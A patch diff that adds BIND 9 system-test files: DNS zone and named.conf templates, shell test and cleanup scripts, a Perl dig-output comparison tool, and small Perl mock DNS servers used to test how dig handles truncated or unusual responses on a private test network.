retcode= match= zones= + . $dir/expect + $COVERAGE $args -K $dir ${zones:-example.com} > coverage.$n 2>&1 + + # check that return code matches expectations + found=$? + if [ $found -ne $retcode ]; then + echo "retcode was $found expected $retcode" + ret=1 + fi + + # check for correct number of errors + found=`grep ERROR coverage.$n | wc -l` + if [ $found -ne $error ]; then + echo "error count was $found expected $error" + ret=1 + fi + + # check for correct number of warnings + found=`grep WARNING coverage.$n | wc -l` + if [ $found -ne $warn ]; then + echo "warning count was $found expected $warn" + ret=1 + fi + + # check for correct number of OKs + found=`grep "No errors found" coverage.$n | wc -l` + if [ $found -ne $ok ]; then + echo "good count was $found expected $ok" + ret=1 + fi + + found=`matchall coverage.$n "$match"` + if [ "$found" = "FAIL" ]; then + echo "no match on '$match'" + ret=1 + fi + + found=`grep Traceback coverage.$n | wc -l` + if [ $found -ne 0 ]; then + echo "python exception detected" + ret=1 + fi + + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/database/clean.sh b/bin/tests/system/database/clean.sh new file mode 100644 index 0000000..f86404c --- /dev/null +++ b/bin/tests/system/database/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/named.conf ns1/named.run ns1/named.memstats +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/database/ns1/named1.conf.in b/bin/tests/system/database/ns1/named1.conf.in new file mode 100644 index 0000000..56c6a07 --- /dev/null +++ b/bin/tests/system/database/ns1/named1.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "database" { + type primary; + database "_builtin empty localhost. hostmaster.isc.org."; +}; diff --git a/bin/tests/system/database/ns1/named2.conf.in b/bin/tests/system/database/ns1/named2.conf.in new file mode 100644 index 0000000..7eb4930 --- /dev/null +++ b/bin/tests/system/database/ns1/named2.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "database" { + type primary; + database "_builtin empty localhost. marka.isc.org."; +}; diff --git a/bin/tests/system/database/setup.sh b/bin/tests/system/database/setup.sh new file mode 100644 index 0000000..b40e103 --- /dev/null +++ b/bin/tests/system/database/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named1.conf.in ns1/named.conf diff --git a/bin/tests/system/database/tests.sh b/bin/tests/system/database/tests.sh new file mode 100644 index 0000000..b919c2f --- /dev/null +++ b/bin/tests/system/database/tests.sh @@ -0,0 +1,55 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" +RNDCCMD="$RNDC -s 10.53.0.1 -p ${CONTROLPORT} -c ../common/rndc.conf" + +# Check the example. domain + +echo_i "checking pre reload zone ($n)" +ret=0 +$DIG $DIGOPTS soa database. @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "hostmaster\.isc\.org" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +copy_setports ns1/named2.conf.in ns1/named.conf +$RNDCCMD reload 2>&1 >/dev/null + +echo_i "checking post reload zone ($n)" +ret=1 +try=0 +while test $try -lt 6 +do + sleep 1 + ret=0 + $DIG $DIGOPTS soa database. @10.53.0.1 > dig.out.ns1.test$n || ret=1 + grep "marka\.isc\.org" dig.out.ns1.test$n > /dev/null || ret=1 + try=`expr $try + 1` + test $ret -eq 0 && break +done +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dialup/clean.sh b/bin/tests/system/dialup/clean.sh new file mode 100644 index 0000000..9318255 --- /dev/null +++ b/bin/tests/system/dialup/clean.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns2/example.bk +rm -f ns3/example.bk +rm -f */named.memstats */named.run +rm -f ns*/named.conf +rm -f ns*/named.lock diff --git a/bin/tests/system/dialup/ns1/example.db b/bin/tests/system/dialup/ns1/example.db new file mode 100644 index 0000000..3ce33f9 --- /dev/null +++ b/bin/tests/system/dialup/ns1/example.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA hostmaster.ns1 ns1 ( + 1 3600 1200 3600000 1200 ) + NS ns1.example. + NS ns2.example. + NS ns3.example. +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/dialup/ns1/named.conf.in b/bin/tests/system/dialup/ns1/named.conf.in new file mode 100644 index 0000000..8ed56a8 --- /dev/null +++ b/bin/tests/system/dialup/ns1/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type master; + file "root.db"; +}; + +zone "example." { + type master; + notify explicit; + also-notify { 10.53.0.2; }; + dialup yes; + file "example.db"; +}; diff --git a/bin/tests/system/dialup/ns1/root.db b/bin/tests/system/dialup/ns1/root.db new file mode 100644 index 0000000..882da96 --- /dev/null +++ b/bin/tests/system/dialup/ns1/root.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA hostmaster.ns1.example ns1.example ( + 1 3600 1200 3600000 1200 ) + NS ns1.example +example NS ns1.example + NS ns2.example + NS ns3.example +ns1.example A 10.53.0.1 +ns2.example A 10.53.0.2 +ns3.example A 10.53.0.3 diff --git a/bin/tests/system/dialup/ns2/hint.db b/bin/tests/system/dialup/ns2/hint.db new file mode 100644 index 0000000..0198f25 --- /dev/null +++ b/bin/tests/system/dialup/ns2/hint.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 1200 NS ns1.example +ns1.example A 10.53.0.1 diff --git a/bin/tests/system/dialup/ns2/named.conf.in b/bin/tests/system/dialup/ns2/named.conf.in new file mode 100644 index 0000000..a30bb0d --- /dev/null +++ b/bin/tests/system/dialup/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +zone "example." { + type slave; + dialup passive; + notify no; + file "example.bk"; + masters { 10.53.0.1; }; +}; diff --git a/bin/tests/system/dialup/ns3/hint.db b/bin/tests/system/dialup/ns3/hint.db new file mode 100644 index 0000000..0198f25 --- /dev/null +++ b/bin/tests/system/dialup/ns3/hint.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 1200 NS ns1.example +ns1.example A 10.53.0.1 diff --git a/bin/tests/system/dialup/ns3/named.conf.in b/bin/tests/system/dialup/ns3/named.conf.in new file mode 100644 index 0000000..df6514d --- /dev/null +++ b/bin/tests/system/dialup/ns3/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +zone "example." { + type slave; + dialup refresh; + notify no; + file "example.bk"; + masters { 10.53.0.2; }; +}; diff --git a/bin/tests/system/dialup/setup.sh b/bin/tests/system/dialup/setup.sh new file mode 100644 index 0000000..dad3589 --- /dev/null +++ b/bin/tests/system/dialup/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/dialup/tests.sh b/bin/tests/system/dialup/tests.sh new file mode 100644 index 0000000..1353569 --- /dev/null +++ b/bin/tests/system/dialup/tests.sh @@ -0,0 +1,65 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +rm -f dig.out.* + +DIGOPTS="+norec +tcp +noadd +nosea +nostat +noquest +nocmd -p ${PORT}" + +# Check the example. domain + +$DIG $DIGOPTS example. @10.53.0.1 soa > dig.out.ns1.test || ret=1 +echo_i "checking that first zone transfer worked" +ret=0 +try=0 +while test $try -lt 120 +do + $DIG $DIGOPTS example. @10.53.0.2 soa > dig.out.ns2.test || ret=1 + if grep SERVFAIL dig.out.ns2.test > /dev/null + then + try=`expr $try + 1` + sleep 1 + else + digcomp dig.out.ns1.test dig.out.ns2.test || ret=1 + break; + fi +done +echo_i "try $try" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that second zone transfer worked" +ret=0 +try=0 +while test $try -lt 120 +do + $DIG $DIGOPTS example. @10.53.0.3 soa > dig.out.ns3.test || ret=1 + if grep SERVFAIL dig.out.ns3.test > /dev/null + then + try=`expr $try + 1` + sleep 1 + else + digcomp dig.out.ns1.test dig.out.ns3.test || ret=1 + break; + fi +done +echo_i "try $try" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/digcomp.pl b/bin/tests/system/digcomp.pl new file mode 100644 index 0000000..8024dea --- /dev/null +++ b/bin/tests/system/digcomp.pl @@ -0,0 +1,164 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Compare two files, each with the output from dig, for differences. +# Ignore "unimportant" differences, like ordering of NS lines, TTL's, +# etc... + +$lc = 0; +if ($ARGV[0] eq "--lc") { + $lc = 1; + shift; +} +$file1 = $ARGV[0]; +$file2 = $ARGV[1]; + +$count = 0; +$firstname = ""; +$status = 0; +$rcode1 = "none"; +$rcode2 = "none"; + +open(FILE1, $file1) || die("open: $file1: $!\n"); +while (<FILE1>) { + ~ s/\r\n//g; + ~ s/\n//g; + if (/^;.+status:\s+(\S+).+$/) { + $rcode1 = $1; + } + next if (/^;/); + if (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s+(.+)$/) { + $name = $1; + $class = $2; + $type = $3; + $value = $4; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if ($type eq "SOA") { + $firstname = $name if ($firstname eq ""); + if ($name eq $firstname) { + $name = "$name$count"; + $count++; + } + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $line = $entry{"$name ; $class.$type ; $value"}; + print("Duplicate entry in $file1:\n> $_\n< $line\n"); + } else { + $entry{"$name ; $class.$type ; $value"} = $_; + } + } elsif (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s*$/) { + $name = $1; + $class = $2; + $type = $3; + $value = ""; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if ($type eq "SOA") { + $firstname = $name if ($firstname eq ""); + if ($name eq $firstname) { + $name = "$name$count"; + $count++; + } + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $line = $entry{"$name ; $class.$type ; $value"}; + print("Duplicate entry in $file1:\n> $_\n< $line\n"); + } else { + $entry{"$name ; $class.$type ; $value"} = $_; + } + } +} +close(FILE1); + +$printed = 0; + +open(FILE2, $file2) || die("open: $file2: $!\n"); +while (<FILE2>) { + ~ s/\r\n//g; + ~ s/\n//g; + if (/^;.+status:\s+(\S+).+$/) { + $rcode2 = $1; + } + next if (/^;/); + if (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s+(.+)$/) { + $name = $1; + $class = $2; + $type = $3; + $value = $4; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if (($name eq $firstname) && ($type eq "SOA")) { + $count--; + $name = "$name$count"; + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $entry{"$name ; $class.$type ; $value"} = ""; + } else { + print("Only in $file2 (missing from $file1):\n") + if ($printed == 0); + print("> $_\n"); + $printed++; + $status = 1; + } + } elsif (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s*$/) { + $name = $1; + $class = $2; + $type = $3; + $value = ""; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if (($name eq $firstname) && ($type eq "SOA")) { + $count--; + $name = "$name$count"; + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $entry{"$name ; $class.$type ; $value"} = ""; + } else { + print("Only in $file2 (missing from $file1):\n") + if ($printed == 0); + print("> $_\n"); + $printed++; + $status = 1; + } + } +} +close(FILE2); + +$printed = 0; + +foreach $key (keys(%entry)) { + if ($entry{$key} ne "") { + print("Only in $file1 (missing from $file2):\n") + if ($printed == 0); + print("< $entry{$key}\n"); + $status = 1; + $printed++; + } +} + +if ($rcode1 ne $rcode2) { + print("< status: $rcode1\n"); + print("> status: $rcode2\n"); + $status = 1; +} + +exit($status); diff --git a/bin/tests/system/digdelv/ans4/startme b/bin/tests/system/digdelv/ans4/startme new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/bin/tests/system/digdelv/ans4/startme @@ -0,0 +1 @@ + diff --git a/bin/tests/system/digdelv/ans5/ans.pl b/bin/tests/system/digdelv/ans5/ans.pl new file mode 100644 index 0000000..6396406 --- /dev/null +++ b/bin/tests/system/digdelv/ans5/ans.pl @@ -0,0 +1,176 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a TCP-only DNS server whose aim is to facilitate testing how dig +# copes with prematurely closed TCP connections. +# +# This server can be configured (through a separate control socket) with a +# series of responses to send for subsequent incoming TCP DNS queries. Only +# one query is handled before closing each connection. In order to keep things +# simple, the server is not equipped with any mechanism for handling malformed +# queries. +# +# Available response types are defined in the %response_types hash in the +# getAnswerSection() function below. Each RR returned is generated dynamically +# based on the QNAME found in the incoming query. + +use IO::File; +use Net::DNS; +use Net::DNS::Packet; + +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.5"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my @response_sequence = ("complete_axfr"); +my $connection_counter = 0; + +# Return the next answer type to send, incrementing the connection counter and +# making sure the latter does not exceed the size of the array holding the +# configured response sequence. +sub getNextResponseType { + my $response_type = $response_sequence[$connection_counter]; + + $connection_counter++; + $connection_counter %= scalar(@response_sequence); + + return $response_type; +} + +# Return an array of resource records comprising the answer section of a given +# response type. +sub getAnswerSection { + my ($response_type, $qname) = @_; + + my %response_types = ( + no_response => [], + + partial_axfr => [ + Net::DNS::RR->new("$qname 300 IN SOA . . 0 0 0 0 300"), + Net::DNS::RR->new("$qname NS ."), + ], + + complete_axfr => [ + Net::DNS::RR->new("$qname 300 IN SOA . . 0 0 0 0 300"), + Net::DNS::RR->new("$qname NS ."), + Net::DNS::RR->new("$qname 300 IN SOA . . 0 0 0 0 300"), + ], + ); + + return $response_types{$response_type}; +} + + +# Generate a Net::DNS::Packet containing the response to send on the current +# TCP connection. If the answer section of the response is determined to be +# empty, no data will be sent on the connection at all (immediate EOF). +sub generateResponse { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + my $response_type = getNextResponseType(); + my $answers = getAnswerSection($response_type, $qname); + for my $rr (@$answers) { + $packet->push("answer", $rr); + } + + print " Sending \"$response_type\" response\n"; + + return $packet->data if @$answers; +} + +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + my $conn = $ctlsock->accept; + @response_sequence = split(' ', $conn->getline); + $connection_counter = 0; + print "Response sequence set to: @response_sequence\n"; + $conn->close; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $buf; + my $lenbuf; + my $conn = $tcpsock->accept; + my $n = $conn->sysread($lenbuf, 2); + die unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + die unless $n == $len; + print "TCP request\n"; + my $response = generateResponse($buf); + if ($response) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } else { + print " No response sent\n"; + } + $conn->close; + } +} diff --git a/bin/tests/system/digdelv/ans6/ans.pl b/bin/tests/system/digdelv/ans6/ans.pl new file mode 100755 index 0000000..39d02b2 --- /dev/null +++ b/bin/tests/system/digdelv/ans6/ans.pl @@ -0,0 +1,84 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.6", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . " 300 A 10.53.0.5")); + } else { + $donotrespond = 1; + } + + if ($donotrespond == 0) { + my $sendsock = + IO::Socket::INET->new(LocalAddr => "10.53.1.2", + PeerAddr => $sock->peerhost, + PeerPort => $sock->peerport, + Proto => "udp") or die "$!"; + print "**** response from ", $sendsock->sockhost, " to " , + $sendsock->peerhost, " port ", $sendsock->peerport, "\n"; + $sendsock->send($packet->data); + $sendsock->close; + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } else { + print "DROP:\n"; + } +} diff --git a/bin/tests/system/digdelv/ans7/ans.pl b/bin/tests/system/digdelv/ans7/ans.pl new file mode 100755 index 0000000..a7aa60e --- /dev/null +++ b/bin/tests/system/digdelv/ans7/ans.pl @@ -0,0 +1,68 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.7", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +STDOUT->autoflush(1); + +print "Net::DNS::VERSION => $Net::DNS::VERSION\n"; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + $packet->header->opcode(5); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + $packet->push("update", rr_del("$qname SOA")); + + print "RESPONSE:\n"; + $packet->print; + + $sock->send($packet->data); +} diff --git a/bin/tests/system/digdelv/clean.sh b/bin/tests/system/digdelv/clean.sh new file mode 100644 index 0000000..ac84c3f --- /dev/null +++ b/bin/tests/system/digdelv/clean.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./*/anchor.* +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run +rm -f ./delv.out.test* +rm -f ./dig.out.*test* +rm -f ./dig.out.mm.* +rm -f ./dig.out.mn.* +rm -f ./dig.out.nm.* 